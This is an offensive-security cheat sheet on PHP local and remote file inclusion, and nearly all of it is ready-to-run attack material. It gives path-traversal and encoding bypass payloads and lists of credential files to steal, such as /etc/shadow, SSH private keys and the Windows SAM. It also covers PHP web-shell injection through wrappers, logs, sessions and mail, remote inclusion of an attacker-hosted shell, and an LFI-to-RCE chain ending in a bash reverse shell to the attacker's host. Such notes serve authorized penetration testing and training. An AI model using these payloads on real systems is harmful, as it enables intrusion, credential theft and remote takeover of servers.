7.3.File-Inclusion.md

File Inclusion (LFI/RFI)

Table of Contents

• Local File Inclusion (LFI)
  • Basic LFI
  • Path Traversal
  • Null Byte Injection
  • Double Encoding
  • Filter Bypass
• Interesting Files
  • Linux
  • Windows
• PHP Wrappers
  • php://filter
  • php://input
  • data://
  • expect://
  • zip://
  • phar://
• Log Poisoning
  • Apache Logs
  • SSH Logs
  • Mail Logs
  • Proc Environ
• Session File Inclusion
• Remote File Inclusion (RFI)
• LFI to RCE
  • Via Log Poisoning
  • Via PHP Session
  • Via Proc Self Environ
  • Via File Upload
  • Via PHP Filters Chain

---

Local File Inclusion (LFI)

Quick Check (One-liner)

curl -s "http://$rhost/page.php?file=../../../etc/passwd" && curl -s "http://$rhost/page.php?file=php://filter/convert.base64-encode/resource=index.php"

Basic LFI

Simple file inclusion

http://$rhost/page.php?file=/etc/passwd
http://$rhost/page.php?page=/etc/passwd
http://$rhost/page.php?include=/etc/passwd

Path Traversal

Directory traversal sequences

../../../etc/passwd
....//....//....//etc/passwd
..%2f..%2f..%2fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
..%252f..%252f..%252fetc/passwd

Absolute path

/etc/passwd
file:///etc/passwd

Null Byte Injection

Bypass extension checks (PHP < 5.3.4)

../../../etc/passwd%00
../../../etc/passwd%00.php
../../../etc/passwd\x00

Double Encoding

Bypass WAF/filters with URL encoding

%252e%252e%252f           # ../
%252e%252e/               # ../
..%c0%af                  # ../ (UTF-8 overlong)
..%ef%bc%8f               # ../ (UTF-8)
%c0%ae%c0%ae/             # ../ (overlong encoding)

Filter Bypass

Bypass str_replace("../", "")

....//....//....//etc/passwd
..././..././..././etc/passwd
....\/....\/....\/etc/passwd

Bypass with path normalization

/var/www/html/../../../etc/passwd
/var/www/images/../../../etc/passwd

Case variation (Windows)

....//....//....//WINDOWS/system.ini

---

Interesting Files

Linux

System files

/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/hostname
/etc/issue
/etc/motd
/etc/resolv.conf
/etc/crontab
/etc/fstab

SSH keys

/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/.ssh/authorized_keys
/root/.ssh/known_hosts
/home/$username/.ssh/id_rsa
~/.ssh/id_rsa

Apache/Nginx

/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/etc/apache2/sites-available/000-default.conf
/etc/apache2/apache2.conf
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/default
/var/www/html/.htaccess

Application configs

/var/www/html/config.php
/var/www/html/wp-config.php
/var/www/html/.env
/var/www/html/configuration.php
/var/www/html/settings.php

Proc filesystem

/proc/self/environ
/proc/self/cmdline
/proc/self/fd/0
/proc/self/status
/proc/version
/proc/net/tcp
/proc/net/arp
/proc/sched_debug

Mail and other logs

/var/log/mail.log
/var/mail/www-data
/var/log/auth.log
/var/log/syslog

Windows

System files

C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY
C:\Windows\win.ini
C:\Windows\system.ini
C:\Windows\debug\NetSetup.log

IIS logs

C:\inetpub\logs\LogFiles\W3SVC1\
C:\inetpub\wwwroot\web.config
C:\Windows\System32\inetsrv\config\applicationHost.config

Application files

C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\htdocs\config.php
C:\wamp\www\config.php

User files

C:\Users\Administrator\Desktop\
C:\Users\Administrator\.ssh\id_rsa
C:\Users\$username\Documents\

---

PHP Wrappers

php://filter

Read source code (base64 encoded)

php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=config.php
php://filter/read=convert.base64-encode/resource=index.php

Read source code (rot13)

php://filter/read=string.rot13/resource=index.php

Read UTF-16 encoded

php://filter/convert.iconv.utf-8.utf-16/resource=index.php

Chain multiple filters

php://filter/convert.base64-encode|convert.base64-decode/resource=index.php

php://input

Execute PHP code via POST body (allow_url_include=On)

POST /page.php?file=php://input HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded

<?php system($_GET['cmd']); ?>

Command execution

POST /page.php?file=php://input&cmd=id HTTP/1.1
Host: $rhost

<?php system($_GET['cmd']); ?>

data://

Execute PHP code inline (allow_url_include=On)

data://text/plain,<?php system('id'); ?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+

Base64 encoded payload

echo '<?php system($_GET["cmd"]); ?>' | base64
# PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==&cmd=id

expect://

Direct command execution (expect wrapper enabled)

expect://id
expect://whoami
expect://ls+-la

zip://

Execute PHP from ZIP archive

# Create malicious zip
echo '<?php system($_GET["cmd"]); ?>' > shell.php
zip shell.zip shell.php

zip://shell.zip%23shell.php&cmd=id
zip:///var/www/html/uploads/shell.zip%23shell.php

phar://

Execute PHP from PHAR archive

# Create phar (requires phar.readonly=Off)
php -d phar.readonly=0 create_phar.php

phar://shell.phar/shell.php&cmd=id
phar:///var/www/html/uploads/shell.phar/shell.php

---

Log Poisoning

Apache Logs

Inject PHP code via User-Agent

curl -A "<?php system(\$_GET['cmd']); ?>" http://$rhost/

Include poisoned log

http://$rhost/page.php?file=/var/log/apache2/access.log&cmd=id
http://$rhost/page.php?file=/var/log/apache/access.log&cmd=id
http://$rhost/page.php?file=/var/log/httpd/access_log&cmd=id

Common log paths

/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/apache/access.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log

SSH Logs

Inject PHP via SSH username

ssh '<?php system($_GET["cmd"]); ?>'@$rhost

Include poisoned SSH log

http://$rhost/page.php?file=/var/log/auth.log&cmd=id

Mail Logs

Send email with PHP payload

telnet $rhost 25
EHLO attacker.com
MAIL FROM:<attacker@attacker.com>
RCPT TO:<?php system($_GET['cmd']); ?>
DATA
.
QUIT

Include mail log

http://$rhost/page.php?file=/var/log/mail.log&cmd=id
http://$rhost/page.php?file=/var/mail/www-data&cmd=id

Proc Environ

Include /proc/self/environ with poisoned User-Agent

curl -A "<?php system(\$_GET['cmd']); ?>" "http://$rhost/page.php?file=/proc/self/environ&cmd=id"

---

Session File Inclusion

Find session file location

/var/lib/php/sessions/sess_<PHPSESSID>
/var/lib/php5/sessions/sess_<PHPSESSID>
/tmp/sess_<PHPSESSID>
C:\Windows\Temp\sess_<PHPSESSID>

Inject PHP in session variable

# If session stores user-controllable data
POST /profile.php HTTP/1.1
Cookie: PHPSESSID=abc123

username=<?php system($_GET['cmd']); ?>

Include poisoned session

http://$rhost/page.php?file=/var/lib/php/sessions/sess_abc123&cmd=id

---

Remote File Inclusion (RFI)

Basic RFI (allow_url_include=On)

http://$rhost/page.php?file=http://$lhost/shell.php
http://$rhost/page.php?file=http://$lhost/shell.txt

Bypass extension checks

http://$rhost/page.php?file=http://$lhost/shell.php%00
http://$rhost/page.php?file=http://$lhost/shell.php?
http://$rhost/page.php?file=http://$lhost/shell.php#

Using SMB share (Windows)

http://$rhost/page.php?file=\\$lhost\share\shell.php

Host shell for RFI

# shell.txt content
<?php system($_GET['cmd']); ?>

# Serve file
python3 -m http.server 80

---

LFI to RCE

Via Log Poisoning

# Step 1: Poison log with PHP code
curl -A "<?php system(\$_GET['cmd']); ?>" http://$rhost/

# Step 2: Include log and execute
curl "http://$rhost/page.php?file=/var/log/apache2/access.log&cmd=id"

# Step 3: Get reverse shell
curl "http://$rhost/page.php?file=/var/log/apache2/access.log&cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F$lhost%2F$lport%200%3E%261'"

Via PHP Session

# Step 1: Set session with PHP payload
curl -c cookies.txt "http://$rhost/login.php?username=<?php system(\$_GET['cmd']); ?>"

# Step 2: Get session ID
SESSID=$(grep PHPSESSID cookies.txt | awk '{print $7}')

# Step 3: Include session file
curl "http://$rhost/page.php?file=/var/lib/php/sessions/sess_$SESSID&cmd=id"

Via Proc Self Environ

curl -A "<?php system(\$_GET['cmd']); ?>" "http://$rhost/page.php?file=/proc/self/environ&cmd=id"

Via File Upload

# Step 1: Upload image with PHP code
exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg

# Step 2: Include uploaded file
http://$rhost/page.php?file=uploads/image.jpg&cmd=id

Via PHP Filters Chain

PHP filter chain for RCE without file write

Tool: https://github.com/synacktiv/php_filter_chain_generator

Install and generate payload

git clone https://github.com/synacktiv/php_filter_chain_generator
cd php_filter_chain_generator

# Generate chain for command execution
python3 php_filter_chain_generator.py --chain '<?php system($_GET["cmd"]); ?>'

Alternative: php_filter_chains_oracle_exploit

git clone https://github.com/synacktiv/php_filter_chains_oracle_exploit
python3 filters_chain_oracle_exploit.py --target "http://$rhost/page.php?file=" --parameter file --chain "<?php system(\$_GET['cmd']); ?>"

Use generated filter chain

http://$rhost/page.php?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|..../resource=php://temp&cmd=id

Common php_filter_chain payload

# Generate base64 shell command
python3 php_filter_chain_generator.py --chain '<?=`$_GET[c]`;?>'

# Use in LFI
http://$rhost/page.php?file=<GENERATED_CHAIN>&c=id

---

See Also

• Command Injection - OS command injection techniques
• File Upload - File upload bypass techniques
• SSTI - Server-Side Template Injection
• Web Application Analysis - Web recon